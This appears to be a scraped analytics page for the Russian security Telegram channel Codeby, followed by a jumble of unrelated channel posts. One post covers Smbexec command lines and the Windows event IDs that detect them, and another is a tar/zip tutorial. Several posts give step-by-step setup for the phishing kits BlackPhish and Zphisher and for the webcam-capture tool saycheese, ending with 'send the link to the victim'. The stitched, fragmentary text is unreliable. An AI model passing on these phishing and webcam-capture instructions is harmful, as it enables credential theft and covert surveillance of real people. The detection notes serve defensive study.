Codeby
Блог сообщества Кодебай Чат: @codeby_one Форум: codeby.net Обучение: codeby.academy CTF: hackerlab.pro VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Реклама: @Savchenkova_Valentina
Show more📈 Analytical overview of Telegram channel Codeby
Channel Codeby (@codeby_sec) in the Russian language segment is an active participant. Currently, the community unites 36 595 subscribers, ranking 3 747 in the Technologies & Applications category and 17 795 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 36 595 subscribers.
According to the latest data from 10 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 201 over the last 30 days and by 15 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 7.67%. Within the first 24 hours after publication, content typically collects 4.14% reactions from the total number of subscribers.
- Post reach: On average, each post receives 2 805 views. Within the first day, a publication typically gains 1 514 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 20.
- Thematic interests: Content is focused on key topics such as edr, api, вектор, mitre, att&ck.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Блог сообщества Кодебай
Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy
CTF: hackerlab.pro
VK: vk.com/codeby
YT: clck.ru/XG99c
Сотрудничество: @KinWiz
Реклама: @Savchenkova_Valentina”
Thanks to the high frequency of updates (latest data received on 11 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
%COMSPEC% /Q /c echo ipconfig > \\127.0.0.1\C$\output && %COMSPEC% /Q /c \\127.0.0.1\C$\execute.bat && del \\127.0.0.1\C$\execute.bat
4️⃣ Удаление временных файлов
После выполнения команды временные файлы удаляются, но логи Windows фиксируют ключевые этапы атаки.
Следы Smbexec в логах Windows
- 4697 — создание службы на целевой машине.
- 4688 — запуск процесса cmd.exe с аргументами из временного .bat файла.
- 5145 — проверка прав доступа к файлам на общем ресурсе (например, `output`).
Пример характерной записи:
%COMSPEC% /Q /c echo ipconfig > \\127.0.0.1\C$\output && %COMSPEC% /Q /c \\127.0.0.1\C$\execute.bat && del \\127.0.0.1\C$\execute.bat
Эти события легко объединяются в последовательность, позволяющую выявить использование Smbexec.Средства защиты могут "проглядеть" скрытую угрозу в объединенных архивах, оставляя вредоносный файл незамеченным.Для обнаружения угроз важно использовать рекурсивные алгоритмы распаковки. Разделение архива на составные части и проверка каждого файла через песочницы (например, VirusTotal) позволяют обнаружить скрытые угрозы. 🔗 Читать полную статью
Lemme know your password
BlackPhish
BlackPhish - утилита предназначена для фишинговых атак, принцип его работы схож с Zphisher, за исключением того, что в обоих проектах не работает ngrok. BlackPhish уступает по кол-ву сервисов по сравнению с Zphisher.
P.S. Работа ngrok также восстановлена, однако установить его вам придётся самим💻Установка:
git clone https://notabug.org/Delifer313/BlackPhish
cd BlackPhish
👩💻Запуск:
sudo python3 BlackPhish.py
Ссылка на мою версию с поддержкой ngrok: https://notabug.org/Delifer313/BlackPhish
Вам необходимо иметь на борту установленный и рабочий ngrok для возможного запуска на сервисе ngrok.P.S. Zphisher прекратил поддержку ngrok, поэтому его поддержку я добавил от себя и постарался сделать максимально удобно.💻Установка:
git clone https://notabug.org/Delifer313/Zphisher
cd Zphisher
💻Запуск:
bash zphisher.shВыбираем нужный сервис, порт рекомендую не менять и ngrok, если вы пользуетесь чем-то другим, используйте то что вам удобнo. В нашем случае вам откроется новое окно с активным ngrok,где вы сможете получить ссылку, а на втором окне видеть кто зашёл и что ввёл. Ссылка на мою версию с поддержкой ngrok: https://notabug.org/Delifer313/Zphisher К сожалению во время тестирования, ngrok заблокировал мой аккаунт за фишинг, так что, как я и говорил "ngrok строго следит за тем, что на нём запускают"
Эти уязвимости особенно привлекательны для авторов вредоносного ПО, в том числе для разработчиков программ-вымогателей.#новости
tar -cf <ИМЯ_АРХИВА>.tar <ФАЙЛЫ>
где, -c - создать новый архив и записать в него файлы, -f - выводит результат в файлТак теперь нужно его разархировать:
tar -xvf <ИМЯ_АРХИВА>.tar
где, -x - разархировать, а -f - выводит результат в файл.А чтобы посмотреть содержимое:
tar -tf <ИМЯ_АРХИВА>.tar
Но бывает и такие ситуации что мы можем забыть что-то, тогда в архив можно добавить файл.
tar -rf <ИМЯ_АРХИВА>.tar <ФАЙЛЫ>
Мы конечно создали архив, но не сжали его, так что мы можем его отправлять, но это будет не очень, поэтому давайте его пересоздадим, но с сжатием, использовать будем gzip так как он самый популярный:
tar -zcf <ИМЯ_АРХИВА>.tar.gz <ФАЙЛЫ>
Для разархивации мы можем использовать тот же ключ -x:
tar -xf <ИМЯ_АРХИВА>.tar.gz
C zip всё по другому, давайте посмотрим как создать архив:
zip -r -9 <ИМЯ_АРХИВА>.zip <ФАЙЛЫ>
где, -r — архивировать рекурсивно, -9 — степень сжатия от 1 до 9.Чтобы запаролить архив, используем ключ -e:
zip -e megapassword -r -9 <ИМЯ_АРХИВА>.zip <ФАЙЛЫ>
Ну а чтобы распаковать:
unzip <ИМЯ_АРХИВА>.zip
Чтобы посмотреть содержимое без распаковки:
unzip -l <ИМЯ_АРХИВА>.zip
Для получения более детальной информации во время разархивирования:
unzip -v <ИМЯ_АРХИВА>.zip
Проверка целостности архива:
unzip -t archive.zip
Примечение: Можно указывать не только файлы но и директории.git clone https://github.com/hangetzzu/saycheese
Переходим в директорию с проектом
cd saycheese
Выдаём права на запуск скрипту
chmod 114 saycheese.sh
⚙️Настройка:
Для удачного запуска устанавливаем ngrok
Далее заходим в файл saycheese.sh и на 171 строке удаляем ./ до ngrok
💻Запуск:
Теперь запускаем ngrok на 3333 порту
ngrok http 3333и запускаем
saycheese выбирая ngrok
bash saycheese.sh
готово, отправляем ссылку жертве!Информационная безопасность — это не только программное обеспечение, но и обучение сотрудников, меры по восстановлению данных и строгие внутренние регламенты.Какими бывают угрозы? 1️⃣ Внешние: 🔸 Вредоносное ПО: трояны, шпионы, шифровальщики. 🔸 SQL-инъекции и DDoS-атаки. 🔸 Фишинг: мошеннические письма и сайты. 2️⃣ Внутренние: 🔸 Случайные ошибки сотрудников, нарушающих правила безопасности. 🔸 Намеренные действия, включая кражу данных за вознаграждение. Последствия кибератак — убытки от простоев, штрафы за утечку данных, потеря лояльности клиентов, ухудшение HR-бренда. Как защитить компанию? 🔸 Технические меры: антивирусы, файрволлы, DLP-системы, IDS/IPS. 🔸 Обучение сотрудников: повышение киберграмотности. 🔸 Пентесты: имитация атак для выявления уязвимостей. Не стоит экономить на безопасности — восстановление после атаки может стоить намного дороже. Лучшая стратегия — это комплексный подход, включающий технические решения, обучение и регулярное тестирование системы. ✔️ В новой статье подробно рассмотрены методы защиты и инструменты, которые помогут предотвратить кибератаки.
Available now! Telegram Research 2025 — the year's key insights 
